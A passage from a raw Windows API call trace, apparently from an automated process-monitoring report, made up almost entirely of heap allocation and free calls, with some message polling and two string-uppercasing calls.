hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0248.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0248.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0248.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0248.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0248.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0248.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0248.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0248.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0248.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0248.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0248.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0248.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0248.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0248.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0248.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0248.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0248.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0248.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0248.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0248.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0248.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0248.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0248.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0248.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0248.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0248.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0248.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0248.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0248.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0248.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0248.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0248.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0248.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0248.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0248.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0248.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0248.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0248.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0248.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0248.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0248.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0248.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0248.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0248.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0248.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0248.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0248.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0248.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0248.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0248.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0248.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0248.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0248.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0248.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0248.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0248.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0248.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0248.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0248.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0248.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0248.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0248.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0248.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0248.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0248.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0248.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0248.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0248.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0248.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0248.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0248.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0248.079] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0248.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0248.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0248.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0248.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0248.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0248.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0248.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0248.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0248.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0248.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0248.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0248.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0248.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0248.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0248.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0248.080] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0248.080] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0248.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0248.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0248.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0248.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0248.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0248.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0248.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0248.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0248.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0248.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0248.081] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0248.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0248.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0248.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0248.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0248.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0248.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0248.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0248.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0248.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0248.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0248.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0248.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0248.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0248.082] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0248.082] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0248.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0248.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0248.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0248.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0248.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0248.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0248.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0248.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0248.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0248.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0248.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0248.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0248.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa388 [0248.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa940 [0248.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa598 [0248.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0248.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5e0 [0248.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0248.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0248.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6a0 [0248.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7f0 [0248.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa850 [0248.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0248.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4a8 [0248.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0248.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4d8 [0248.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0248.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa30 [0248.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9b8 [0248.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0248.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3a0 [0248.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7d8 [0248.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0248.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab50 [0248.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa538 [0248.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0248.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0248.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0248.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0248.084] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0248.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0248.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa310 [0248.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0248.085] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0248.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0248.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0248.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0248.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0248.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0248.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0248.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0248.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0248.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0248.085] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0248.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0248.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0248.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0248.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0248.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0248.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0248.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0248.086] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0248.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0248.086] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0248.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0248.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0248.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0248.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0248.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0248.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0248.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0248.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0248.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0248.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0248.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0248.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0248.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0248.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0248.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0248.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0248.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0248.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0248.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0248.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0248.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0248.098] HeapFree (in: 